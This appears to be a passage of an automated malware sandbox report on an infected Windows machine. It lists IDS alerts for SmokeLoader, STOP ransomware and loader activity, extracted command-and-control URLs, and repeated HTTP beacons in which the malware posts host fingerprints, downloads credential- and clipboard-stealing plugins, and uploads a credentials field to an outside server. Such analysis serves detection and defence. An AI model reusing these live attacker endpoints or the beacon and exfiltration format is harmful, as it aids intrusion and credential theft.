                Source: C:\Windows\explorer.exeNetwork Connect: 183.100.39.157 80
                Source: C:\Windows\explorer.exeDomain query: shsplatform.co.uk
                Source: C:\Windows\explorer.exeNetwork Connect: 222.236.49.123 80
                Source: C:\Windows\explorer.exeNetwork Connect: 194.180.48.90 80
                Source: C:\Windows\explorer.exeNetwork Connect: 222.236.49.124 80
                Source: TrafficSnort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:57990 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:56924 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:53975 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.3:49713 -> 123.140.161.243:80
                Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.3:49713 -> 123.140.161.243:80
                Source: TrafficSnort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:59636 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 175.119.10.231:80 -> 192.168.2.3:49711
                Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.3:49714 -> 211.59.14.90:80
                Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 211.59.14.90:80 -> 192.168.2.3:49714
                Source: TrafficSnort IDS: 2839238 ETPRO TROJAN Blackmoon CnC Activity 192.168.2.3:49720 -> 103.100.211.218:80
                Source: TrafficSnort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:60767 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.3:49721 -> 175.119.10.231:80
                Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.3:49721 -> 175.119.10.231:80
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50032
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50032
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50032
                Source: Malware configuration extractorURLs: 45.9.74.80/0bjdn2Z/index.php
                Source: Malware configuration extractorURLs: http://zexeq.com/raud/get.php
                Source: Malware configuration extractorURLs: http://toobussy.com/tmp/
                Source: Malware configuration extractorURLs: http://wuc11.com/tmp/
                Source: Malware configuration extractorURLs: http://ladogatur.ru/tmp/
                Source: Malware configuration extractorURLs: http://kingpirate.ru/tmp/
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199508624021
                Source: Malware configuration extractorURLs: https://t.me/looking_glassbot
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAzNzI2Host: 45.9.74.80Content-Length: 103878Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /0bjdn2Z/Plugins/cred64.dll HTTP/1.1Host: 45.9.74.80
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: GET /0bjdn2Z/Plugins/clip64.dll HTTP/1.1Host: 45.9.74.80
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
                Source: global trafficHTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
